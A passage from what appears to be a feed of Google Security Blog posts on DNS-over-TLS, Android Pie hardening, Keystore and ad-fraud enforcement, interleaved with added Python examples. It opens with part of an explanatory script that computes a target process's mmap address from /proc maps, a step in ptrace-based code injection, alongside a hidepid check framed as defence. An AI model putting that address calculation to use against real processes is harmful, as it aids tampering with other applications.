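        if len(fields) >= 4 and fields[1] == "/proc":
            for opt in fields[3].split(","):
                if opt.startswith("hidepid="):
                    value = opt.split("=", 1)[1]
                    return int(value) if value.isdigit() else value
            return 0
    return None


# Constructed /proc/self/maps excerpt for the injector (32-bit ARM layout).
INJECTOR_MAPS = """\
b6e3c000-b6f27000 r-xp 00000000 b3:19 1234    /system/lib/libc.so
b6f27000-b6f2b000 r--p 000ea000 b3:19 1234    /system/lib/libc.so
b6f2b000-b6f2d000 rw-p 000ee000 b3:19 1234    /system/lib/libc.so
"""
# Constructed /proc/[pid]/maps excerpt for the target: same libc, different slide.
TARGET_MAPS = """\
b6c1a000-b6d05000 r-xp 00000000 b3:19 1234    /system/lib/libc.so
b6d05000-b6d09000 r--p 000ea000 b3:19 1234    /system/lib/libc.so
b6d09000-b6d0b000 rw-p 000ee000 b3:19 1234    /system/lib/libc.so
"""
# Assumed (constructed) position of mmap inside libc in the injector.
LOCAL_MMAP = 0xb6e3c000 + 0x3c8e0
# Constructed /proc/mounts lines: a pre-7.0 layout, then an Android 7.0+ layout.
MOUNTS_OLD = "proc /proc proc rw,relatime 0 0\n"
MOUNTS_NEW = "proc /proc proc rw,relatime,gid=3009,hidepid=2 0 0\n"


if __name__ == "__main__":
    # On a Linux host this repeats the computation with live data for this process.
    import ctypes
    local_mmap = ctypes.cast(ctypes.CDLL(None).mmap, ctypes.c_void_p).value
    with open("/proc/self/maps") as f, open("/proc/mounts") as g:
        maps, mounts = f.read(), g.read()
    print("mmap offset into libc: 0x%x" % (local_mmap - library_base(maps)))
    print("hidepid on /proc:", proc_hidepid(mounts))
    print("target mmap (constructed maps): 0x%x"
          % remote_address(INJECTOR_MAPS, LOCAL_MMAP, TARGET_MAPS))
```

    The offset trick only holds when both processes map the same libc file; on a system with a 32-bit injector and a 64-bit target the computed address is meaningless, which is why the maps path, not just the base address, is worth checking. The hidepid check is the defender's side of step 1: a non-zero value means a process cannot enumerate other processes' /proc entries by name, so injectors that start from /proc/[pid]/cmdline fail before ptrace is ever called.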

  • Google Public DNS now supports DNS-over-TLS
    by Google Security PR on January 9, 2019 at 6:29 pm

    Posted by Marshall Vale, Product Manager, and Puneet Sood, Software Engineer

    Google Public DNS is the world’s largest public Domain Name Service (DNS) recursive resolver, allowing anyone to convert Internet domain names like www.example.com into the Internet addresses needed by an email application or web browser. Just as your search queries can expose sensitive information, the domains you look up via DNS can also be sensitive. Starting today, users can secure queries between their devices and Google Public DNS with DNS-over-TLS, preserving their privacy and integrity.

    The DNS environment has changed for the better since we launched Google Public DNS over eight years ago. Back then, as today, part of Google Public DNS’ mission has been to improve the security and accuracy of DNS for users all over the world. But today, there is an increased awareness of the need to protect users’ communication with their DNS resolvers against forged responses and to safeguard their privacy from network surveillance. The DNS-over-TLS protocol (RFC 7858) specifies a standard way to provide security and privacy for DNS traffic between users and their resolvers. Now users can secure their connections to Google Public DNS with TLS, the same technology that protects their HTTPS web connections.

    We implemented the DNS-over-TLS specification along with the RFC 7766 (DNS over TCP) recommendations to minimize the overhead of using TLS. These include support for TLS 1.3 (for faster connections and improved security), TCP Fast Open, and pipelining of multiple queries and out-of-order responses over a single connection. All of this is deployed on Google’s serving infrastructure, which provides reliable and scalable management for DNS-over-TLS connections.

    Use DNS-over-TLS today

    Android 9 (Pie) device users can use DNS-over-TLS today through the Private DNS setting, using the hostname dns.google. For configuration instructions for Android and other systems, please see the documentation.
    Advanced Linux users can use the Stubby resolver from dnsprivacy.org to talk to Google’s DNS-over-TLS service. If you have a problem with Google Public DNS-over-TLS, you can create an issue on our tracker or ask on our discussion group. As always, please provide as much information as possible to help us investigate the problem! […]
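    The features the post lists, length-prefixed messages over one TLS connection, pipelining, and out-of-order responses, are visible in the bytes a client sends and receives. The following is an added example for this page, not Google's code or the Stubby resolver's: it builds DNS queries by hand, frames them as RFC 7766 requires, splits a received byte stream back into messages, and pairs responses with queries by message ID so that the order in which the resolver answers does not matter. The resolver answers used to exercise the parser are constructed in build_fake_response; only query_over_tls touches the network, and the server name dns.google is assumed to be the one Android's Private DNS setting uses.

```python
"""Added example, not Google's code: the DNS-over-TLS wire exchange built and
parsed by hand. RFC 7858 carries ordinary DNS messages inside TLS; RFC 7766
prefixes each message with a 2-byte big-endian length and lets a client
pipeline several queries on one connection with responses returned in any
order, so responses are matched to queries by message ID, not by arrival
order. Resolver answers used by the tests are constructed here;
query_over_tls is the only function that touches the network."""
import socket
import ssl
import struct

def encode_name(name):
    """Owner name as length-prefixed labels ending in a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"

def build_query(name, msg_id, qtype=1):
    """Standard recursive query (QR=0, RD=1) for `name`, class IN, one question."""
    header = struct.pack(">HHHHHH", msg_id, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", qtype, 1)

def frame(msg):
    """RFC 7766 framing for TCP and TLS transports: 2-byte length prefix."""
    return struct.pack(">H", len(msg)) + msg

def split_frames(stream):
    """Split a byte stream into complete messages; returns (messages, leftover)."""
    msgs, pos = [], 0
    while pos + 2 <= len(stream):
        (length,) = struct.unpack(">H", stream[pos:pos + 2])
        if pos + 2 + length > len(stream):
            break                       # partial frame, wait for more bytes
        msgs.append(stream[pos + 2:pos + 2 + length])
        pos += 2 + length
    return msgs, stream[pos:]

def skip_name(msg, pos):
    """Advance past a name, which may end in a 2-byte compression pointer."""
    while True:
        length = msg[pos]
        if length == 0:
            return pos + 1
        if length & 0xC0 == 0xC0:
            return pos + 2
        pos += 1 + length

def parse_response(msg):
    """Return (msg_id, rcode, [IPv4 strings from A records in the answer])."""
    msg_id, flags, qdcount, ancount, _, _ = struct.unpack(">HHHHHH", msg[:12])
    pos = 12
    for _ in range(qdcount):
        pos = skip_name(msg, pos) + 4       # skip QTYPE and QCLASS
    addrs = []
    for _ in range(ancount):
        pos = skip_name(msg, pos)
        rtype, _, _, rdlen = struct.unpack(">HHIH", msg[pos:pos + 10])
        pos += 10
        if rtype == 1 and rdlen == 4:
            addrs.append(".".join(str(b) for b in msg[pos:pos + 4]))
        pos += rdlen
    return msg_id, flags & 0x000F, addrs

def match_responses(queries, stream):
    """Pair pipelined responses, in whatever order they arrive, with their queries."""
    pending = {struct.unpack(">H", q[:2])[0] for q in queries}
    paired = {}
    for msg in split_frames(stream)[0]:
        msg_id, rcode, addrs = parse_response(msg)
        if msg_id in pending:               # drop responses to IDs we never sent
            paired[msg_id] = (rcode, addrs)
    return paired

def build_fake_response(query, ipv4, ttl=300):
    """Constructed resolver answer for offline testing, not data from any resolver."""
    rdata = bytes(int(x) for x in ipv4.split("."))
    answer = b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, ttl, 4) + rdata
    return query[:2] + struct.pack(">HHHHH", 0x8180, 1, 1, 0, 0) + query[12:] + answer

def query_over_tls(names, server="dns.google", port=853):
    """Live lookup over one TLS session; `server` is also the SNI and the name the
    certificate is validated against. Resolving `server` itself needs plain DNS."""
    ctx = ssl.create_default_context()
    queries = [build_query(n, 0x1000 + i) for i, n in enumerate(names)]
    with socket.create_connection((server, port), timeout=5) as raw, \
            ctx.wrap_socket(raw, server_hostname=server) as tls:
        tls.sendall(b"".join(frame(q) for q in queries))   # pipelined in one write
        stream, paired = b"", {}
        while len(paired) < len(queries):
            chunk = tls.recv(4096)
            if not chunk:
                break
            stream += chunk
            paired = match_responses(queries, stream)
    return paired
```

    Two points a client gets wrong at its peril are visible here: a TLS record boundary is not a DNS message boundary, so split_frames has to tolerate a partial trailing frame, and because a pipelining resolver may answer a fast cached query before a slow one, reading responses positionally would hand the wrong answer to the wrong query. The message IDs in this example are sequential for readability; a production client should pick them unpredictably.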

  • Android Pie à la mode: Security & Privacy
    by Aaron Stein on December 20, 2018 at 6:40 pm

    Posted by Vikrant Nanda and René Mayrhofer, Android Security & Privacy Team

    [Cross-posted from the Android Developers Blog]

    There is no better time to talk about Android dessert releases than the holidays, because who doesn’t love dessert? And what is one of our favorite desserts during the holiday season? Well, pie of course. In all seriousness, pie is a great analogy because of how the various ingredients turn into multiple layers of goodness: right from the software crust on top to the hardware layer at the bottom. Read on for a summary of security and privacy features introduced in Android Pie this year.

    Platform hardening

    With Android Pie, we updated File-Based Encryption to support external storage media (such as expandable storage cards). We also introduced support for metadata encryption where hardware support is present. With filesystem metadata encryption, a single key present at boot time encrypts whatever content is not encrypted by file-based encryption (such as directory layouts, file sizes, permissions, and creation/modification times).

    Android Pie also introduced a BiometricPrompt API that apps can use to provide biometric authentication dialogs (such as a fingerprint prompt) on a device in a modality-agnostic fashion. This functionality creates a standardized look, feel, and placement for the dialog. This kind of standardization gives users more confidence that they’re authenticating against a trusted biometric credential checker.

    New protections and test cases for the Application Sandbox help ensure all non-privileged apps targeting Android Pie (and all future releases of Android) run in stronger SELinux sandboxes.
    By providing per-app cryptographic authentication to the sandbox, this protection improves app separation, prevents overriding safe defaults, and (most significantly) prevents apps from making their data widely accessible.

    Anti-exploitation improvements

    With Android Pie, we expanded our compiler-based security mitigations, which instrument runtime operations to fail safely when undefined behavior occurs.

    Control Flow Integrity (CFI) is a security mechanism that disallows changes to the original control flow graph of compiled code. In Android Pie, it has been enabled by default within the media frameworks and other security-critical components, such as for Near Field Communication (NFC) and Bluetooth protocols. We also implemented support for CFI in the Android common kernel, continuing our efforts to harden the kernel in previous Android releases.

    Integer Overflow Sanitization is a security technique used to mitigate memory corruption and information disclosure vulnerabilities caused by integer operations. We’ve expanded our use of Integer Overflow sanitizers by enabling their use in libraries where complex untrusted input is processed or where security vulnerabilities have been reported.

    Continued investment in hardware-backed security

    One of the highlights of Android Pie is Android Protected Confirmation, the first major mobile OS API that leverages a hardware-protected user interface (Trusted UI) to perform critical transactions completely outside the main mobile operating system. Developers can use this API to display a trusted UI prompt to the user, requesting approval via a physical protected input (such as a button on the device). The resulting cryptographically signed statement allows the relying party to reaffirm that the user would like to complete a sensitive transaction through their app.
    We also introduced support for a new Keystore type that provides stronger protection for private keys by leveraging tamper-resistant hardware with dedicated CPU, RAM, and flash memory. StrongBox Keymaster is an implementation of the Keymaster hardware abstraction layer (HAL) that resides in a hardware security module. This module is designed and required to have its own processor, secure storage, True Random Number Generator (TRNG), side-channel resistance, and tamper-resistant packaging.

    Other Keystore features (as part of Keymaster 4) include Keyguard-bound keys, Secure Key Import, 3DES support, and version binding. Keyguard-bound keys enable use restriction so as to protect sensitive information. Secure Key Import facilitates secure key use while protecting key material from the application or operating system. You can read more about these features in our recent blog post as well as the accompanying release notes.

    Enhancing user privacy

    User privacy has been boosted with several behavior changes, such as limiting the access background apps have to the camera, microphone, and device sensors. New permission rules and permission groups have been created for phone calls, phone state, and Wi-Fi scans, as well as restrictions around information retrieved from Wi-Fi scans. We have also added associated MAC address randomization, so that a device can use a different network address when connecting to a Wi-Fi network.

    On top of that, Android Pie added support for encrypting Android backups with the user’s screen lock secret (that is, PIN, pattern, or password). By design, this means that an attacker would not be able to access a user’s backed-up application data without specifically knowing their passcode. Auto backup for apps has been enhanced by providing developers a way to specify conditions under which their app’s data is excluded from auto backup.
    For example, Android Pie introduces a new flag to determine whether a user’s backup is client-side encrypted.

    As part of a larger effort to move all web traffic away from cleartext (unencrypted HTTP) and towards being secured with TLS (HTTPS), we changed the defaults for Network Security Configuration to block all cleartext traffic. We’re protecting users with TLS by default, unless you explicitly opt in to cleartext for specific domains. Android Pie also adds built-in support for DNS over TLS, automatically upgrading DNS queries to TLS if a network’s DNS server supports it. This protects information about the IP addresses visited from being sniffed or intercepted at the network level.

    We believe that the features described in this post advance the security and privacy posture of Android, but you don’t have to take our word for it. Year after year our continued efforts are demonstrably resulting in better protection, as evidenced by increasing exploit difficulty and independent mobile security ratings. Now go and enjoy some actual pie while we get back to preparing the next Android dessert release!

    Making Android more secure requires a combination of hardening the platform and advancing anti-exploitation techniques.

    Acknowledgements: This post leveraged contributions from Chad Brubaker, Janis Danisevskis, Giles Hogben, Troy Kensinger, Ivan Lozano, Vishwath Mohan, Frank Salim, Sami Tolvanen, Lilian Young, and Shawn Willden. […]

  • New Keystore features keep your slice of Android Pie a little safer
    by Google Security PR on December 12, 2018 at 6:44 pm

    Posted by Lilian Young and Shawn Willden, Android Security; and Frank Salim, Google Pay

    [Cross-posted from the Android Developers Blog]

    New Android Pie Keystore Features

    The Android Keystore provides application developers with a set of cryptographic tools that are designed to secure their users’ data. Keystore moves the cryptographic primitives available in software libraries out of the Android OS and into secure hardware. Keys are protected and used only within the secure hardware to protect application secrets from various forms of attacks. Keystore gives applications the ability to specify restrictions on how and when the keys can be used. Android Pie introduces new capabilities to Keystore. We will be discussing two of these new capabilities in this post. The first enables restrictions on key use so as to protect sensitive information. The second facilitates secure key use while protecting key material from the application or operating system.

    Keyguard-bound keys

    There are times when a mobile application receives data but doesn’t need to immediately access it if the user is not currently using the device. Sensitive information sent to an application while the device screen is locked must remain secure until the user wants access to it. Android Pie addresses this by introducing keyguard-bound cryptographic keys. When the screen is locked, these keys can be used in encryption or verification operations, but are unavailable for decryption or signing. If the device is currently locked with a PIN, pattern, or password, any attempt to use these keys will result in an invalid operation. Keyguard-bound keys protect the user’s data while the device is locked, and are only available when the user needs it. Keyguard binding and authentication binding both function in similar ways, except with one important difference: keyguard binding ties the availability of keys directly to the screen lock state, while authentication binding uses a constant timeout.
    With keyguard binding, the keys become unavailable as soon as the device is locked and are only made available again when the user unlocks the device. It is worth noting that keyguard binding is enforced by the operating system, not the secure hardware. This is because the secure hardware has no way to know when the screen is locked. Hardware-enforced Android Keystore protection features, like authentication binding, can be combined with keyguard binding for a higher level of security. Furthermore, since keyguard binding is an operating system feature, it’s available to any device running Android Pie. Keys for any algorithm supported by the device can be keyguard-bound. To generate or import a key as keyguard-bound, call setUnlockedDeviceRequired(true) on the KeyGenParameterSpec or KeyProtection builder object at key generation or import.

    Secure Key Import

    Secure Key Import is a new feature in Android Pie that allows applications to provision existing keys into Keystore in a more secure manner. The origin of the key, a remote server that could be sitting in an on-premise data center or in the cloud, encrypts the secure key using a public wrapping key from the user’s device. The encrypted key in the SecureKeyWrapper format, which also contains a description of the ways the imported key is allowed to be used, can only be decrypted in the Keystore hardware belonging to the specific device that generated the wrapping key. Keys are encrypted in transit and remain opaque to the application and operating system, meaning they’re only available inside the secure hardware into which they are imported. Secure Key Import is useful in scenarios where an application intends to share a secret key with an Android device, but wants to prevent the key from being intercepted or from leaving the device. Google Pay uses Secure Key Import to provision some keys on Pixel 3 phones, to prevent the keys from being intercepted or extracted from memory.
    There are also a variety of enterprise use cases, such as S/MIME encryption keys being recovered from a Certificate Authority’s escrow so that the same key can be used to decrypt emails on multiple devices. To take advantage of this feature, please review this training article. Please note that Secure Key Import is a secure hardware feature, and is therefore only available on select Android Pie devices. To find out if the device supports it, applications can attempt to generate a KeyPair with PURPOSE_WRAP_KEY. […]

  • Tackling ads abuse in apps and SDKs
    by Google Security PR on December 7, 2018 at 5:05 pm

    Posted by Dave Kleidermacher, VP, Head of Security & Privacy – Android & Play

    Providing users with safe and secure experiences, while helping developers build and grow quality app businesses, is our top priority at Google Play. And we’re constantly working to improve our protections.

    Google Play has been working to minimize app install attribution fraud for several years. In 2017 Google Play made available the Google Play Install Referrer API, which allows ad attribution providers, publishers and advertisers to determine which referrer was responsible for sending the user to Google Play for a given app install. This API was specifically designed to be resistant to install attribution fraud, and we strongly encourage attribution providers, advertisers and publishers to insist on this standard of proof when measuring app install ads. Users, developers, advertisers and ad networks all benefit from a transparent, fair system.

    We also take reports of questionable activity very seriously. If an app violates our Google Play Developer policies, we take action. That’s why we began our own independent investigation after we received reports of apps on Google Play accused of conducting app install attribution abuse by falsely claiming credit for newly installed apps to collect the download bounty from that app’s developer.

    We now have an update regarding our ongoing investigation: On Monday, we removed two apps from the Play Store because our investigation discovered evidence of app install attribution abuse. We also discovered evidence of app install attribution abuse in 3 ad network SDKs. We have asked the impacted developers to remove those SDKs from their apps.
    Because we believe most of these developers were not aware of the behavior of these third-party SDKs, we have given them a short grace period to take action. Google Ads SDKs were not utilized for any of the abusive behaviors mentioned above.

    Our investigation is ongoing and additional reviews of other apps and third-party SDKs are still underway. If we find evidence of additional policy violations, we will take action. We will continue to investigate and improve our capabilities to better detect and protect against abusive behavior and the malicious actors behind it. […]
